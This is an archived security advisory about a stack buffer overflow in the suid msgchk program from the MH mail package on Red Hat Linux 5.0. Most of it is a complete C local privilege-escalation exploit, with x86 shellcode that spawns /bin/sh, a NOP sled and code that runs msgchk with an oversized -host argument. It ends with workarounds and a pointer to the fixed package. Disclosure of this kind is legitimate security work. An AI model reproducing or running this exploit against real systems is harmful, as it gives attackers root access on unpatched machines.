COMMAND

    msgchk

SYSTEMS AFFECTED

    Linux RedHat 5.0

PROBLEM

    Jorge Hurtado Rojo posted the following msgchk exploit:

        msgchk -host `perl -e 'print "A" x 2000'`

    leads to a  segfault, which can  be exploited to  get root access.
    The exploit follows.

    /* Almost  everything here  taken from  Aleph One's  Article about
       stack smashing (Phrack 49) */

    #include <stdlib.h>

    #define DEFAULT_OFFSET                 0
    #define DEFAULT_BUFFER_SIZE            1018
    #define NOP                            0x90
    char shellcode[] =
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* Return the current stack pointer (i386 only).  The inline asm copies
       %esp into %eax and the function then falls off the end with no
       return statement: the value reaches the caller only because %eax is
       the i386 return register.  In standard C this is undefined behaviour
       and it will not work on other architectures or under optimisation
       that reuses %eax before the implicit return. */
    unsigned long get_sp(void) {
       __asm__("movl %esp,%eax");
    }

    void main(int argc, char *argv[]) {
      char *buff, *ptr;
    char *args[5];
    char jorge[]="";
      long *addr_ptr, addr;
      int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
      int i;
      if (argc > 1) bsize  = atoi(argv[1]);
      if (argc > 2) offset = atoi(argv[2]);

      if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
      }

      addr = get_sp() - offset;
      printf("Using address: 0x%x\n", addr);

      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4) {
        buff[i]=addr & 0xFF;
        buff[i+1]=(addr >> 8) & 0xFF;
        buff[i+2]=(addr >> 16) & 0xFF;
        buff[i+3]=(addr >> 24) & 0xFF;
      }

        *(addr_ptr++) = addr;

      for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

      ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

      buff[bsize - 1] = '\0';

      args[0]="/usr/bin/mh/msgchk";
      args[1]="-host";
      args[2]=buff;
      args[3]=NULL;
      execve(args[0],args,NULL);

    }

    You may want to check the 'mh' vulnerability under the Linux section too.

SOLUTION

    A workaround is to remove the suid bit, but you won't do anything wrong
    by uninstalling the package, compiling it without RPOP / suid, or using
    a wrapper (safeload).

    This vulnerability is not present when using mh-6.8.4-6 in RH 5.0.
    msgchk ends with:

        msgchk: argument AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAA (2000 times) too long

    However, mh-6.8.4-6 is  not the version  shipped with RedHat  5.0.
    That's the fixed version available in their errata page at

        http://www.redhat.com/support/docs/rhl/rh50-errata-general.html#mh